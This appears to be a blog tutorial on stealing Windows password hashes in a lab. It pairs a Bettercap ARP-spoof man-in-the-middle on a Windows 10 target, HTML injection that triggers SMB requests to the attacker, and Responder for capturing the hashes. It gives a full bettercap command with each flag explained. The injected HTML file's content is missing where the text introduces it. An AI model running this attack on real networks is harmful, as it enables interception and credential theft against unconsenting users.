To steal hashes with Bettercap there’s a few things we need to do first. In Kali we will need Bettercap and Responder. Responder is installed by default, but it might be worth gettting the version from Git, but it’s not neccesary though. As for Bettercap, luckily, there is a version in the Kali repo’s so we can simply run ‘apt-get install bettercap’.
Once we have Bettercap we are ready to start our man in the middle attack. We are going to use Bettercap to perform an Arp-Spoof attack against a Windows 10 machine, we are then going to use the HTTP-Proxy module within Bettercap to inject some HTML which will hopefully make an outbound SMB request to our attacker machine. This should allow us to steal the hashed password of betterthe signed in user.
Let’s break down the command in the screenshot above:
bettercap -T 192.168.0.40 -X –proxy –proxy-module injecthtml –html-file lol.html –allow-local-connections
- -T – Target (192.168.0.40 in my case)
- -X – Enable Sniffers
- –proxy – Proxy HTTP traffic through our Kali Machine
- –proxy-module injecthtml – Use the proxy module ‘injecthtml’
- –html-file lol.html – Inject the HTML from this file
- –allow-local-connections – If you don’t do this any direct connections to our attacker machine will be redirected to a rick-roll
Inside of lol.html we put:
Finally we need to run Responder in order to capture the hashes we steal from the Windows 10 machine.
We can then browse to a HTTP (not HTTPS) website in our Windows 10 machine using Internet Explorer or Edge and we will be automatically sent the User’s hash!